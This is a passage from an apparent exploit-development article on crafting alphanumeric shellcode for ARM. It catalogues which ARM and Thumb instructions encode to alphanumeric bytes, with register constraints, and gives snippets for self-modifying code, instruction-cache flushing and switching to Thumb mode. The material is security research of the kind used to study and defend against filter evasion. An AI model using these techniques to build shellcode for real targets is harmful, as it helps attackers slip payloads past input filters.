|USADA8 |6+ |1 |0 |0 |0 |IO: 23, IZ: 6-5 |
|USAT |6+ |1 |1 |1 |d |IO: 23 |
|USAT16 |6+ |1 |1 |1 |0 |IO: 23 |
|USUB16 |6+ |0 |1 |0 |1 | |
|USUB8 |6+ |0 |1 |0 |1 |IO: 7 |
|USUBADDX |6+ |0 |1 |0 |1 | |
|UXTAB |6+ |1 |1 |1 |0 |IO: 23 |
|UXTAB16 |6+ |1 |1 |0 |0 |IO: 23 |
|UXTAH |6+ |1 |1 |1 |1 |IO: 23 |
|UXTB |6+ |1 |1 |1 |0 |IO: 23 |
|UXTB16 |6+ |1 |1 |0 |0 |IO: 23 |
|UXTH |6+ |1 |1 |1 |1 |IO: 23 |
+-----------+--------+--+--+--+--+---------------------------+
From the list of 147 instructions that are present in the latest
revision of the ARM documentation, we will now remove all
instructions that require a specific ARM architecture version and
all the instructions that we have disqualified based on whether or
not they have bit patterns which are incompatible with alphanumeric
characters.
This leaves us with 18 instructions, as listed in the reference
manual: B/BL, CDP, EOR, LDC, LDM(1), LDM(2), LDR, LDRB, LDRBT, LDRT,
MCR, MRC, RSB, STM(2), STRB, STRBT, SUB, SWI.
There are a few instructions listed here that are of limited use to
us though:
- B/BL: the Branch instruction is of limited use to us in most
cases: the last 24 bits of this instruction are taken and
then shifted left two positions (because instructions must always
start at a multiple of 4). The result is then added to the
program counter and execution will then continue at that location.
To make this offset alphanumeric, we would have to jump at least
12MB from our current location, this limits the usefulness of this
instruction since we will not always be able to control memory that
is at least 12MB from our shellcode.
- CDP: is used to tell the coprocessor to do some kind of data
processing. Since we can not be sure about which coprocessors
may be available or not on a specific platform, we discard this
instruction as well.
- LDC: the load coprocessor instruction loads data from a
consecutive range of memory addresses into a coprocessor.
- MCR/MRC: move to and from coprocessor register to and from ARM
registers. While this instruction could be useful for caching
purposes (more on this later), it is a privileged instruction
before ARMv6.
We are now left with 13 instructions: EOR, LDM(1), LDM(2), LDR,
LDRB, LDRBT, LDRT, RSB, STM, STRB, STRBT, SUB, SWI. We now group
together the instructions that have the same basic functionality
but that only differ in the details. For instance, LDR loads a word
from memory into a register whereas LDRB loads a byte into the least
significant bytes of a register. We get the following:
- EOR: Exclusive OR
- LDM (LDM(1), LDM(2)): Load multiple registers from a consecutive
memory locations
- LDR (LDR, LDRB, LDRBT, LDRT): Load value from memory
into a register
- STM: Store multiple registers to consecutive memory locations
- STR (STRB, STRBT): Store a register to memory
- SUB (SUB, RSB): Subtract
- SWI: Software Interrupt a.k.a. do a system call
Unfortunately, the instructions in the above list are not always
alphanumeric. Depending on which operands are used, these functions
may still generate non-alphanumeric characters. Hence, some
additional constraints must be specified for each function. Below,
we discuss these constraints for the instructions in the groups.
- EOR: Syntax: EOR{<cond>}{S} <Rd>, <Rn>, <shifter_operand>
31 28 27 26 25 24 23 22 21 20 19 16 15 12 11 0
+-----+--+--+--+--+--+--+--+--+-----+-----+-------------------+
|cond | 0| 0| I| 0| 0| 0| 1| S| Rn | Rd | shifter_operand |
+-----+--+--+--+--+--+--+--+--+-----+-----+-------------------+
In order for the second byte to be alphanumeric, the S bit must be
set to 1. If this bit is set to 0, the resulting value would be
less than 47, which is not alphanumeric. Rn can also not be a
register higher than R9. Since Rd is encoded in the first four bits
of the third byte, it may not start with a 1. This means that only
the low registers can be used. In addition, register R0 to R2 can
not be used, because this would generate a byte that is too
low to be alphanumeric. The shifter operand must be tweaked, such
that its most significant four bytes generate valid alphanumeric
characters in combination with Rd. The eight least significant
bits are, of course, also significant as they fully determine the
fourth byte of the instruction. Details about the shifter operand
can be found in the ARM architecture reference manual.
- LDM(1): Syntax: LDM{<cond>}<addressing_mode> <Rn>{!}, <registers>
31 28 27 26 25 24 23 22 21 20 19 16 15 0
+-----+--+--+--+--+--+--+--+--+------+---------------+
|cond | 1| 0| 0| P| U| 0| W| 1| Rn | register list |
+-----+--+--+--+--+--+--+--+--+------+---------------+
LDM(2): Syntax: LDM{<cond>}<addressing_mode> <Rn>,
<registers_without_pc>^
31 28 27 26 25 24 23 22 21 20 19 16 15 14 0
+-----+--+--+--+--+--+--+--+--+------+--+---------------+
|cond | 1| 0| 0| P| U| 1| 0| 1| Rn | 0| register list |
+-----+--+--+--+--+--+--+--+--+------+------------------+
The list of registers that is loaded into memory is stored in the
last two bytes of the instructions. As a result, not any list of
registers can be used. In particular, for the low registers,
R7 can never be used. R6 or R5 must be used, and if R6 is not used,
R4 must be used. The same goes for the high registers.
Additionally, the U bit must be set to 0 and the W bit to 1, to
ensure that the second byte of the instruction is alphanumeric. For
Rn, registers R0 to R9 can be used with LDM(1), and R0 to R10 can
be used with LDM(2).
- LDR: Syntax: LDR{<cond>} <Rd>, <addressing_mode>
31 28 27 26 25 24 23 22 21 20 19 16 15 12 11 0
+-----+--+--+--+--+--+--+--+--+-----+-----+-------------+
|cond | 0| 1| I| P| U| 0| W| 1| Rn | Rd | addr_mode |
+-----+--+--+--+--+--+--+--+--+-----+-----+-------------+
LDRB: Syntax: LDR{<cond>}B <Rd>, <addressing_mode>
31 28 27 26 25 24 23 22 21 20 19 16 15 12 11 0
+-----+--+--+--+--+--+--+--+--+-----+-----+-------------+
|cond | 0| 1| I| P| U| 1| W| 1| Rn | Rd | addr_mode |
+-----+--+--+--+--+--+--+--+--+-----+-----+-------------+
LDRBT: Syntax: LDR{<cond>}BT <Rd>, <post_indexed_addressing_mode>
31 28 27 26 25 24 23 22 21 20 19 16 15 12 11 0
+-----+--+--+--+--+--+--+--+--+-----+-----+-------------+
|cond | 0| 1| I| 0| U| 1| 1| 1| Rn | Rd | addr_mode |
+-----+--+--+--+--+--+--+--+--+-----+-----+-------------+
LDRT: Syntax: LDR{<cond>}T <Rd>, <post_indexed_addressing_mode>
31 28 27 26 25 24 23 22 21 20 19 16 15 12 11 0
+-----+--+--+--+--+--+--+--+--+-----+-----+-------------+
|cond | 0| 1| I| 0| U| 0| 1| 1| Rn | Rd | addr_mode |
+-----+--+--+--+--+--+--+--+--+-----+-----+-------------+
The details of the addressing mode are described in the ARM
reference manual and will not be repeated here for brevity's sake.
However, the addressing mode must be specified in a way such that
the fourth byte of the instruction is alphanumeric, and the least
significant four bits of the third byte generate a valid character in
combination with Rd. Rd cannot be one of the high registers, and
cannot be R0-R2. The U bit must also be 0.
- STM: Syntax: STM{<cond>}<addressing_mode> <Rn>, <registers>^
31 28 27 26 25 24 23 22 21 20 19 16 15 0
+-----+--+--+--+--+--+--+--+--+------+---------------+
|cond | 1| 0| 0| P| U| 1| 0| 0| Rn | register list |
+-----+--+--+--+--+--+--+--+--+------+---------------+
STRB: Syntax: STR{<cond>}B <Rd>, <addressing_mode>
31 28 27 26 25 24 23 22 21 20 19 16 15 12 11 0
+-----+--+--+--+--+--+--+--+--+-----+-----+-------------+
|cond | 0| 1| I| P| U| 1| W| 0| Rn | Rd | addr_mode |
+-----+--+--+--+--+--+--+--+--+-----+-----+-------------+
STRBT: Syntax: STR{<cond>}BT <Rd>, <post_indexed_addressing_mode>
31 28 27 26 25 24 23 22 21 20 19 16 15 12 11 0
+-----+--+--+--+--+--+--+--+--+-----+-----+-------------+
|cond | 0| 1| I| 0| U| 1| 1| 0| Rn | Rd | addr_mode |
+-----+--+--+--+--+--+--+--+--+-----+-----+-------------+
The structure of STM is very similar to the structure of the LDM
operation, and the structure of STRB(T) is very similar to LDRB(T).
Hence, comparable constraints apply. The only difference is that
other values for Rn must be used in order to generate an alphanumeric
character for the third byte of the instruction.
- SUB: Syntax: SUB{<cond>}{S} <Rd>, <Rn>, <shifter_operand>
31 28 27 26 25 24 23 22 21 20 19 16 15 12 11 0
+-----+--+--+--+--+--+--+--+--+-----+-----+-------------------+
|cond | 0| 0| I| 0| 0| 1| 0| S| Rn | Rd | shifter_operand |
+-----+--+--+--+--+--+--+--+--+-----+-----+-------------------+
RSB: Syntax: RSB{<cond>}{S} <Rd>, <Rn>, <shifter_operand>
31 28 27 26 25 24 23 22 21 20 19 16 15 12 11 0
+-----+--+--+--+--+--+--+--+--+-----+-----+-------------------+
|cond | 0| 0| I| 0| 0| 1| 1| S| Rn | Rd | shifter_operand |
+-----+--+--+--+--+--+--+--+--+-----+-----+-------------------+
To get the second byte of the instruction to be alphanumeric, Rn
and the S bit must be set accordingly. In addition, Rd cannot be
one of the high registers, or R0-R2. As with the previous
instructions, we refer you to the ARM architecture reference manual
for a detailed instruction of the shifter operand.
- SWI: Syntax: SWI{<cond>} <immed_24>
31 28 27 26 25 24 23 0
+-----+--+--+--+--+----------------------------+
|cond | 1| 1| 1| 1| immed_24 |
+-----+--+--+--+--+----------------------------+
As will become clear further in the article, it was essential for
us that the first byte of the SWI call is alphanumeric.
Fortunately, this can be accomplished by using one of the condition
codes discussed in the previous section. The other three bytes are
fully determined by the immediate value that is passed as the
operand of the SWI instruction.
----[ 2.4 Getting a known value in a register
When our shellcode starts executing, we are faced with a problem:
We do not know which values the registers contain. So we must place
our own value in a register, however we don't have any traditional
instructions for doing this. We can't use MOV because that is not
alphanumeric. So we must make do with our remaining instructions.
If we look at our arithmetic instructions, we can't EOR or SUB
a register with/from itself to get a 0 into a register as using
3 registers as arguments is not alphanumeric. We could EOR or SUB
with an immediate, but we don't know the values in the registers
so we can't give an appropriate immediate which will return the
expected value.
Given that these are our only arithmetic instructions, we can't
arithmetically get a known value into a register. So our approach
has been to use LDR. Since we know which code we're writing, we can
use our shellcode as data and load a byte from the shellcode into a
register.
This is done as follows:
SUB r3, pc, #48
LDRB r3, [r3, #-48]
PC will always point to our shellcode, however we can't directly
access it in an LDR instruction as this would result in
non-alphanumeric code. So we copy PC to R3 by subtracting 48 from
PC. Then we use R3 in our LDRB instruction to load a known byte from
our shellcode into R3 (we use an immediate offset to ensure that the
last byte of the instruction is alphanumeric). Once this is done we
can use R3 as the base register for loading values into other
registers. Subtracting 48 from R3 will give us 0, subtracting 49
will give us -1, performing an exclusing or with a known value will
give us another known value, etc.
----[ 2.5 Writing to R0-R2
One of the constraints, mentioned in section 2.3 on most functions
that have an Rd operand, is that registers R0 to R2 cannot be used
as destination register. The reason is that the destination register
is encoded in the four most significant bits of the third byte of an
operation. If these bits are set to the value 0, 1 or 2, this would
generate a byte that is not alphanumerical.
On ARM processors, registers R0 to R3 are used to transfer
parameters to function calls. If the function has more than 4
parameters, the additional parameters are pushed to the stack. This
poses a problem for us, because we will need to populate registers
R0 to R3 in our shellcode, in order to pass arguments to functions
and system calls. However, it's not easy to write to the contents of
these registers, because most operations do not support having R0-R2
as a destination register.
There is, however, one operation that we can use to write to the
three lowest registers, without generating non-alphanumeric
instructions. The LDM instruction loads values from the stack into
multiple registers. It encodes the list of registers it needs to
write to in the last two bytes of the instruction. Hence, if bits 0
to 2 are set, registers R0 to R2 will be used to write data to. In
order to get the bytes of the instruction to become alphanumeric, we
have to add some other registers to the list. In the example
shellcode, we will use registers R3 to R7 to do our calculations,
store the results to the stack, and then load the results in R0 to
R2 with the LDM instruction.
Thumb mode doesn't suffer from this problem, because the resulting
register is encoded differently.
----[ 2.6 Self-modifying Code
With the instructions that remain after discarding all
non-alphanumeric bytes, it's pretty hard to write interesting
shellcode. There's only limited support for arithmetic operations,
which makes it difficult to do the calculations that are necessary
to make system calls. In addition, there's no branch instruction
either, making loops impossible. So it seems that we are not even
Turing complete.
An interesting option would be to switch from the ARM to the Thumb
instruction set. Since thumb instructions are shorter, it is likely
that more instructions are available for this instruction set.
However, in order to go from ARM to Thumb mode, we need the BX
instruction, which executes a branch and an optional exchange of
processor state. This instruction is, however, not alphanumeric.
Another possibility is to write self-modifying code. The basic idea
is to compute and write non-alphanumeric instructions to memory,
using only alphanumeric instructions. Then, when the desired code is
written in memory, simply jump to the instructions to execute them.
Let's take a look at an example. To keep this simple, we consider
here non-alphanumeric shellcode. Only null bytes are not allowed.
Imagine you want to execute the instruction:
mov r0, #0
The resulting bytes for this instruction are 0xe3a00000. Since there
are two null bytes in this instruction, we will either need another
instruction or self-modifying code. In this example, we will use
self-modifying code:
ldrh r1, [pc, #6]
eor r1, #384
strh r1, [pc, #-2]
.byte 0xe3, 0xa0, 0x80, 0x01
In this short code fragment, we load the 0x80 and 0x01 bytes in
register R1, we XOR them with 384 (which results in the value 0),
and we store the result back over the original instruction. This
code has no null bytes in it anymore.
----[ 2.7 The Instruction Cache
ARM processors have an instruction cache which makes writing
self-modifying code hard to do since all the instructions that are
being executed will most likely already have been cached. The Intel
architecture has a specific requirement to be compatible with
self-modifying code and as such, will make sure that when code is
modified in memory the cache that possibly contains those
instructions is invalidated. ARM has no such requirement, which
means that the instructions that have been modified in memory could
be different from the instructions that are actually executed since
they could have been cached. Given the size of the instruction cache
(16kb on our processor), and the proximity of the modified
instructions it is very hard to write self-modifying shellcode
without having to flush the instruction cache.
One way of ensuring that we can bypass the instruction cache is to
use the MCR instruction, which allows us to move a register to the
system coprocessor and is alphanumeric. We can set a specific bit in
a register and then move that register to the status register of the
system coprocessor, allowing us to turn off the instruction cache.
However, as we mentioned in section 2.3, this instruction is
privileged before ARMv6. Because it is not usable in all shellcode
as such, we will not discuss it.
These cache issues and the fact that we can't just turn off the
cache are the reasons why the fact that the SWI instruction can be
represented alphanumerically was essential: we can't modify the SWI
instruction in memory before flushing the cache, but we will need
this instruction to perform a flush of the instruction cache. On
ARM/Linux, the system call for a cache flush is 0x9F0002. None of
these bytes are alphanumeric and since they are issued as part of an
instruction this could result in a problem for our self-modifying
code. However, SWI generates a software interrupt and to the
interrupt handler, 0x9F0002 is actually data and as a result will
not be read via the instruction cache, so if we modify the argument
to SWI in our self-modifyign code, the argument will be read
correctly.
In non-alphanumeric code, we would flush the instruction cache with
this sequence of operations:
mov r0, #0
mov r1, #-1
mov r2, #0
swi 0x9F0002
Since these instructions generate a number of non-alphanumeric
characters, we will need self-modifying code techniques to use this
in the shellcode.
----[ 2.8 Going to Thumb Mode
As discussed in section 1.5, we don't need to go into Thumb mode
to make our shellcode work, but it is more convenient since we only
need to make 2 bytes alphanumeric per instruction rather than 4.
Below is an example that will get us into Thumb mode:
sub r6, pc, #-1
bx r6
However, the BX instruction is not alphanumeric, so we must
overwrite our shellcode to execute the correct instruction. We must
modify this instruction before executing the system call to flush
the instruction cache.
Below is the list of Thumb instructions and their constraints with
respect to processor version and if it's possible to display them
alphanumerically.
+-------------+---------+--------------+
| instruction | version | disqualifier |
+-------------+---------+--------------+
| ADC | | |
| ADD (1) | | IZ:14-13 |
| ADD (2) | | |
| ADD (3) | | IZ:14-13 |
| ADD (4) | | |
| ADD (5) | | IO: 15 |
| ADD (6) | | IO: 15 |
| ADD (7) | | IO: 15 |
| AND | | Pattern is @ |
| ASR (1) | | IZ:14-13 |
| ASR (2) | | |
| B (1) | | IO:15 |
| B (2) | | IO:15 |
| BIC | | IO:7 |
| BKPT | 5T+ | IO:15 |
| BL | | IO:15 |
| BLX (1) | 5T+ | IO:15 |
| BLX (2) | 5T+ | IO:7 |
| BX | | |
| CMN | | IO:7 |
| CMP (1) | | |
| CMP (2) | | IO:7 |
| CMP (3) | | |
| CPS | 6+ | IO:7 |
| CPY | 6+ | |
| EOR | | Pattern is @ |
| LDMIA | | IO:15 |
| LDR (1) | | |
| LDR (2) | | |
| LDR (3) | | |
| LDR (4) | | IO:15 |
| LDRB (1) | | |
| LDRB (2) | | |
| LDRH (1) | | IO:15 |
| LDRH (2) | | |
| LDRSB | | |
| LDRSH | | |
| LSL (1) | | IZ: 14-13 |
| LSL (2) | | IO: 7 |
| LSR (1) | | IZ: 14-13 |
| LSR (2) | | IO: 7 |
| MOV (1) | | IZ: 14,12 |
| MOV (2) | | IZ: 14-13 |
| MOV (3) | | |
| MUL | | |
| MVN | | IO:7 |
| NEG | | |
| ORR | | |
| POP | | IO:15 |
| PUSH | | IO:15 |
| REV | 6+ | IO:15 |
| REV16 | 6+ | IO:15 |
| REVSH | 6+ | IO:15 |
| ROR | | IO:7 |
| SBC | | IO:7 |
| SETEND | 6+ | IO:15 |
| STMIA | | IO:15 |
| STR (1) | | |
| STR (2) | | |
| STR (3) | | IO:15 |
| STRB (1) | | |
| STRB (2) | | |
| STRH (1) | | IO:15 |
| STRH (2) | | |
| SUB (1) | | IZ: 14-13 |
| SUB (2) | | |
| SUB (3) | | IZ: 14-13 |
| SUB (4) | | IZ:15 |
| SWI | | IZ:15 |
| SXTB | 6+ | IZ:15 |
| SXTH | 6+ | IZ:15 |
| TST | | |
| UXTB | 6+ | IZ:15 |
| UXTH | 6+ | IZ:15 |
+-------------+---------+--------------+
If we remove instructions which are not available on all ARM
architectures, can not be represented alphanumerically or
require special hardware, and then group together the instructions
with similar purposes, we get the following list of instructions
- ADC: Add with Cary
- ADD: Add
- ASR: Arithmetic Shift Right
- BX: Branch and Exchange
- CMP: Compare
- LDR: Load Register
- MOV: Move
- MUL: Multiply
- NEG: Negate
- ORR: Logical Or
- STR: Store Register
- SUB: Substract
- TST: Test
As you can see we have a lot more instructions available in Thumb
mode than we did in ARM mode. However there are many constraints on
the use of these instructions. For every instruction we can only use
specific registers or specific values. The constraints here are more
esoteric than they are for ARM because of the limited size of
instructions. We will go over each instructions and its
limitations.
- ADC: Syntax: ADC <Rd>, <Rm>
15 14 13 12 11 10 9 8 7 6 5 3 2 0
+--+--+--+--+--+--+--+--+--+--+-----+-----+
| 0| 1| 0| 0| 0| 0| 0| 1| 0| 1| Rm | Rd |
+--+--+--+--+--+--+--+--+-----+-----+-----+
Since bit 7 is set to 0 and bit 6 is set to one, we can use
just about any low register for Rm and Rd, the only
combination of registers that we must exclude is the use of R0 as
both Rm and Rd since that would result in 0x40 or an '@'.
The main problem with this instruction is that we must know the
value of the carry flag as it will be added to the result of the
addition.
- ADD: There are seven versions of the thumb mode ADD instruction listed
in the reference manual. We will refer to them as the reference
manual does, i.e. ADD (1) to ADD (7).
ADD (1), ADD (3), ADD (5), ADD (6) and ADD (7) can not be used
because their first byte is not alphanumeric.
This leaves us with:
- ADD (2): add a constant value to a register
Syntax: ADD <Rd>, #<imm_8>
15 14 13 12 11 10 8 7 0
+--+--+--+--+--+-----+---------------+
| 0| 0| 1| 1| 0| Rd | imm_8 |
+--+--+--+--+--+-----+---------------+
Rd can be any low register but imm_8 must follow the
constraints of being alphanumeric:
- 47 < imm_8 < 123
- imm_8 is not 58-64 or 91-96.
- ADD (4): adds the value of two registers of which one or
both must be a high register.
Syntax: ADD <Rd>, <Rm>
15 14 13 12 11 10 9 8 7 6 5 3 2 0
+--+--+--+--+--+--+--+--+---+---+-----+-----+
| 0| 1| 0| 0| 0| 1| 0| 0| H1| H2| Rm | Rd |
+--+--+--+--+--+--+--+--+---+---+-----+-----+
With H1 = 1 if Rd is a high register and H2 = 1 if Rm
is a high register.
In our case the destination register, Rd may not be a high
register because that would set bit 7 of the instruction
to 1. As a result, we can only use this instruction to add
the contents of a high register to a low one. However
since bit 7 must be 0 and bit 6 must be 1, we can't use
register R8 as Rm and R0 as Rd together (i.e. we can't do
ADD r0, r8) since that would result in the second byte
being an '@'. In theory we could use this instruction to
be able to add 2 low registers to each other, since for
some registers the encoding would still be alphanumeric,
however the reference manual specifies that if both
registers are low, then the result is unpredictable. So
the behavior may vary from one processor version to the
next.
- ASR: There are two versions of ASR, ASR (1) and (2) respectively.
ASR (1) allows the shifting of a register by a constant, however
this is not alphanumeric. So we must use the second version of
this instruction, ASR (2), which shifts a register based on the
value in another register.
Syntax: ASR <Rd>, <RS>
15 14 13 12 11 10 9 8 7 6 5 3 2 0
+--+--+--+--+--+--+--+--+--+--+-----+-----+
| 0| 1| 0| 0| 0| 0| 0| 1| 0| 0| Rs | Rd |
+--+--+--+--+--+--+--+--+-----+-----+-----+
Since bits 7 and 6 of ASR are 0, the first 2 bits of Rs must be 1.
This means that Rs must be either R6 or R7.
- BX: Syntax: BX <Rm>
15 14 13 12 11 10 9 8 7 6 5 3 2 0
+--+--+--+--+--+--+--+--+--+---+-----+-----+
| 0| 1| 0| 0| 0| 1| 1| 1| 0| H2| Rm | SBZ |
+--+--+--+--+--+--+--+--+--+---+-----+-----+
The branch and exchange instruction can be used to enter ARM mode.
This is useful if we have code which starts off in Thumb mode:
since SWI is not alphanumeric in Thumb, we can't flush the cache
if we write self-modifying code. We can, however use the
BX instruction to get into ARM mode, where the SWI instruction is
alphanumeric. We discuss this in more detail below.
If bit 6 is 0, we must have bits 5 and 4 set to 1, this means that
we can only use R6 and R7 from the low registers. For the high
registers we can use R9, R10, R11, R13, R14 and R15
- CMP: There are three versions of CMP: CMP (1) to CMP (3). CMP (2) is
not alphanumeric.
- CMP (1) compares a register to an immediate.
Syntax: CMP <Rn>, #<imm_8>
15 14 13 12 11 10 8 7 0
+--+--+--+--+--+-----+---------------+
| 0| 0| 1| 0| 1| Rn | imm_8 |
+--+--+--+--+--+-----+---------------+
As with ADD (2), Rn can be any low register but imm_8 must
follow the constraints of being alphanumeric:
- 47 < imm_8 < 123
- imm_8 is not 58-64 or 91-96.
- CMP (3) compares the value of two registers of which one or
both must be a high register.
Syntax: CMP <Rn>, <Rm>
15 14 13 12 11 10 9 8 7 6 5 3 2 0
+--+--+--+--+--+--+--+--+---+---+-----+-----+
| 0| 1| 0| 0| 0| 1| 0| 1| H1| H2| Rm | Rd |
+--+--+--+--+--+--+--+--+---+---+-----+-----+
The same restrictions apply as for ADD. In our case Rn may not
be a high register because that would set bit 7 of the
instruction to 1. As a result, we can only use this instruction
to compare the contents of a high register to a low one.
As with ADD, Rm can not be R8 if Rn is R0 and comparing
two low registers is unpredictable.
- LDR: There are many versions of this instruction: LDR (1) to LDR (4),
LDRB (1), LDRB (2), LDRH (1), LDRH (2), LDRSB and LDRSH. Of these,
only LDR (4) and LDRH (1) are not alphanumeric.
- LDR (1) Loads a word from memory address stored in a register
into another register. A word offset of maximum 5 bits (i.e. the
value is multiplied by 4) can be given to the register containing
the memory address.
Syntax: LDR <Rd>, [<Rn>, #<imm_5> * 4]
15 14 13 12 11 10 6 5 3 2 0
+--+--+--+--+--+----------+-----+-----+
| 0| 1| 1| 0| 1| imm_5 | Rn | Rd |
+--+--+--+--+--+----------+-----+-----+
The constraints on register use in this case depend on the value
of the immediate. However, we can conclude that in no cases can Rn
and Rd both be R0 at the same time.
If imm_5 is uneven (i.e. bit 6 is set) , then all other registers
can be used. However, if imm_5 is even (i.e. bit 6 is not set),
then only R6 and R7 can be used as Rn.
- LDR (2) does the same as LDR (1) except that the offset to the
register containing the memory address to read from is stored in a
register and as a result can be larger than 32.
Syntax: LDR <Rd>, [<Rn>, <Rm>]
15 14 13 12 11 10 9 8 6 5 3 2 0
+--+--+--+--+--+--+--+-----+-----+-----+
| 0| 1| 0| 1| 1| 0| 0| Rm | Rn | Rd |
+--+--+--+--+--+--+--+-----+-----+-----+
Since bit 7 must be 0, Rm is already constrained to registers: R0,
R1, R4 and R5. However, if Rm is R0 or R4, then Rn must be R6
or R7. If Rm is R1 or R5 then Rn and Rd can not both be R0.
- LDR (3) loads a word into a register based on an 8 bit offset
from the program counter (PC).
Syntax: LDR <Rd>, [PC, #<imm_8> * 4]
15 14 13 12 11 10 8 7 0
+--+--+--+--+--+-----+---------------+
| 0| 1| 0| 0| 1| Rd | imm_8 |
+--+--+--+--+--+-----+---------------+
As with ADD (2) and CMP (1) Rd can be any low register but
imm_8 must follow the constraints of being alphanumeric.
- LDRB (1) is essentially the same as LDR (1) except that it loads
a byte from memory instead of a word.
Syntax: LDRB <Rd>, [<Rn>, #<imm_5>]
15 14 13 12 11 10 6 5 3 2 0
+--+--+--+--+--+----------+-----+-----+
| 0| 1| 1| 1| 1| imm_5 | Rn | Rd |
+--+--+--+--+--+----------+-----+-----+
Similar restrictions apply, with the added restriction however
that imm_5 must be lower than 12, because otherwise the first byte
is larger than 'z' (0x7a). However, if imm_5 is 11 or 10, then
bit 7 of the second byte will be set to one, so in reality it must
be lower than 10 and not equal 7, 6, 2 or 3.
- LDRB (2) is the same as LDR (2) except that it behaves like
LDRB (1), i.e. it loads a byte instead of a word.
Syntax: LDRB <Rd>, [<Rn>, <Rm>]
15 14 13 12 11 10 9 8 6 5 3 2 0
+--+--+--+--+--+--+--+-----+-----+-----+
| 0| 1| 0| 1| 1| 1| 0| Rm | Rn | Rd |
+--+--+--+--+--+--+--+-----+-----+-----+
Since the second byte is identical, the same restrictions as
for LDR (2) apply.
- LDRH (2) is the same as LDR (2) and LDRB (2), except it loads a
halfword (16 bits).
Syntax: LDRH <Rd>, [<Rn>, <Rm>]
15 14 13 12 11 10 9 8 6 5 3 2 0
+--+--+--+--+--+--+--+-----+-----+-----+
| 0| 1| 0| 1| 1| 0| 1| Rm | Rn | Rd |
+--+--+--+--+--+--+--+-----+-----+-----+
The same restrictions as for LDR (2) and LDRB (2) apply.
- LDRSB is the same as LDRB (2), except that it interprets the
byte that it loads as signed.
Syntax: LDRSB <Rd>, [<Rn>, <Rm>]
15 14 13 12 11 10 9 8 6 5 3 2 0
+--+--+--+--+--+--+--+-----+-----+-----+
| 0| 1| 0| 1| 0| 1| 1| Rm | Rn | Rd |
+--+--+--+--+--+--+--+-----+-----+-----+
Again, the same restrictions apply as for LDRB(2).
- LDRSH is the halfword equivalent of LDRSB.
Syntax: LDRSH <Rd>, [<Rn>, <Rm>]
15 14 13 12 11 10 9 8 6 5 3 2 0
+--+--+--+--+--+--+--+-----+-----+-----+
| 0| 1| 0| 1| 1| 1| 1| Rm | Rn | Rd |
+--+--+--+--+--+--+--+-----+-----+-----+
The same restrictions apply as for LDRB(2) and LDRH (2).
- MOV: There are three versions of this instrction: MOV (1) to MOV (3),
but only MOV (3) is alphanumeric. MOV (3) moves to, from or between
high registers.
Syntax: MOV <Rd>, <Rm>
15 14 13 12 11 10 9 8 7 6 5 3 2 0
+--+--+--+--+--+--+--+--+---+---+-----+-----+
| 0| 1| 0| 0| 0| 1| 1| 0| H1| H2| Rm | Rd |
+--+--+--+--+--+--+--+--+---+---+-----+-----+
As with other instructions (ADD and CMP) that operate on high
registers, Rd can not be R0 if Rm is R8 and using two low registers
is unpredictable.
- MUL: Syntax: MUL <Rd>, <Rm>
15 14 13 12 11 10 9 8 7 6 5 3 2 0
+--+--+--+--+--+--+--+--+--+--+-----+-----+
| 0| 1| 0| 0| 0| 0| 1| 1| 0| 1| Rm | Rd |
+--+--+--+--+--+--+--+--+--+--+-----+-----+
Since the second byte of MUL is identical to the second byte of the
ADC instruction, it has the same limitations.
I.e. the only limitation on registers is that we can't use R0 as
both Rm and Rd, all other combinations with low registers are
valid.
- NEG: Syntax: NEG <Rd>, <Rm>
15 14 13 12 11 10 9 8 7 6 5 3 2 0
+--+--+--+--+--+--+--+--+--+--+-----+-----+
| 0| 1| 0| 0| 0| 0| 1| 0| 0| 1| Rm | Rd |
+--+--+--+--+--+--+--+--+--+--+-----+-----+
The second byte of NEG is identical to the second bytes of MUL and
ADC, so the same limitations apply.
- STR: As with LDR, there are many versions of STR: STR (1) to STR (3),
STRB (1) and (2), STRH (1) and (2). However STR (3) and STRH (1)
are not alphanumeric.
- STR (1) the complementary instruction to LDR (1) stores a word
from a register to memory. As with LDR (1), it will take an
immediate of 5 bytes that it multiplies by 4 and uses as offset
for a base register that contains a memory address to write to.
Syntax: STR <Rd>, [<Rn>, #<imm_5> * 4]
15 14 13 12 11 10 6 5 3 2 0
+--+--+--+--+--+----------+-----+-----+
| 0| 1| 1| 0| 0| imm_5 | Rn | Rd |
+--+--+--+--+--+----------+-----+-----+
The same limitations as with LDR (1) apply.
- STR (2) is the complementary instruction to LDR (2).
Syntax: STR <Rd>, [<Rn>, <Rm>]
15 14 13 12 11 10 9 8 6 5 3 2 0
+--+--+--+--+--+--+--+-----+-----+-----+
| 0| 1| 0| 1| 0| 0| 0| Rm | Rn | Rd |
+--+--+--+--+--+--+--+-----+-----+-----+
Again, the same limitations as with LDR (2) apply.
- STRB (1) is complementary to LDRB (1).
Syntax: STRB <Rd>, [<Rn>, #<imm_5>]
15 14 13 12 11 10 6 5 3 2 0
+--+--+--+--+--+----------+-----+-----+
| 0| 1| 1| 1| 0| imm_5 | Rn | Rd |
+--+--+--+--+--+----------+-----+-----+
Since bit 11 is 0, the limitations are less stringent than with
LDRB (1). As such, the limitations of STR (1) apply rather than
the ones of LDRB (1).
- STRB (2) is complementary to LDRB (2)
Syntax: STRB <Rd>, [<Rn>, <Rm>]
15 14 13 12 11 10 9 8 6 5 3 2 0
+--+--+--+--+--+--+--+-----+-----+-----+
| 0| 1| 0| 1| 0| 1| 0| Rm | Rn | Rd |
+--+--+--+--+--+--+--+-----+-----+-----+
The same limitations as with LDRB (2) apply.
- STRH (2) is complementary to LDRH (2).
Syntax: STRH <Rd>, [<Rn>, <Rm>]
15 14 13 12 11 10 9 8 6 5 3 2 0
+--+--+--+--+--+--+--+-----+-----+-----+
| 0| 1| 0| 1| 0| 0| 1| Rm | Rn | Rd |
+--+--+--+--+--+--+--+-----+-----+-----+
The same limitations apply.
- SUB: There are four versions of SUB, but only SUB (2) is alphanumeric.
Syntax: SUB <Rd>, <imm_8>
15 14 13 12 11 10 8 7 0
+--+--+--+--+--+-----+---------------+
| 0| 0| 1| 1| 1| Rd | imm_8 |
+--+--+--+--+--+-----+---------------+
Since the second byte of SUB (2) only contains an immediate, it has
the same limitations as the second byte of ADD (2), CMP (1) and
LDR(3).
However, unlike in ADD (2), CMP (1) and LDR (3), we can't use any
register for Rd. Since the first 5 bits of SUB are 00111, this
covers a range of 0x38 to 0x3f. However only 0x38 and 0x39 (the
characters '8' and '9') are alphanumeric. This means that we can
only use registers R0 and R1 as Rd this SUB instruction.
- TST: Syntax: TST <Rn>, <Rm>
15 14 13 12 11 10 9 8 7 6 5 3 2 0
+--+--+--+--+--+--+--+--+--+--+-----+-----+
